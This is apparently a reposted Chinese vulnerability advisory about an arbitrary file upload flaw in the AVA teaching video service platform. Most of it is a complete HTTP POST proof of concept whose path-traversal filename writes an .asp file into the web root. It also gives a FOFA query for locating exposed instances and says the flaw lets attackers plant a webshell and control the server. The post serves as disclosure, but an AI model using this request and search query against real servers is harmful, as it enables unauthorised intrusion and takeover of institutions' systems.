奥威亚 教学视频应用服务平台任意文件上传漏洞
2023-12-15 07:0:50 Author: 网络安全透视镜(查看原文) 阅读量:23 收藏

一、漏洞描述

AVA 教学视频应用服务平台是由广州市奥威亚电子科技有限公司基于当前教育视频资源建设的背景及用户需求的调研,开发出来能够适应时代发展和满足学校需求,具有实效性、多功能、特点鲜明的平台。

该平台存在任意文件上传漏洞,通过此漏洞攻击者可上传webshell木马,远程控制服务器。

二、网络空间搜索引擎搜索

fofa查询

body="/CSS/NewtonTheme/assets/app.css"

三、漏洞复现

POC

POST /Tools/Video/VideoCover.aspx HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchangev=b3;q=0.9Connection: closePragma: no-cacheCache-Control: no-cacheUpgrade-Insectre-Requests: 1Accept-Language: zh-CN,zh;g=0.9Content-Length: 242Content-Type: multipart/form-data; boundary=68c4ca658cd4332dc386f53710e63a10
--68c4ca658cd4332dc386f53710e63a10Content-Disposition: form-data; name="file"; filename="/../../../AVA.ResourcesPlatform.WebUI/check.asp"Content-Type: image/jpeg
This website has a vulnerability!!!--68c4ca658cd4332dc386f53710e63a10--

上传后路径为: http://ip:port/check.asp

四、漏洞检测

nuclei漏洞检测

pocsuite3漏洞检测

漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498748&idx=1&sn=e214adb27e4a92c58e8d2ff92e65ec1e&chksm=966f99b70a9d965092e3b8ce9972bce47017e330be6adab94ccece3e080ac0a5a5501fcbeef8&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh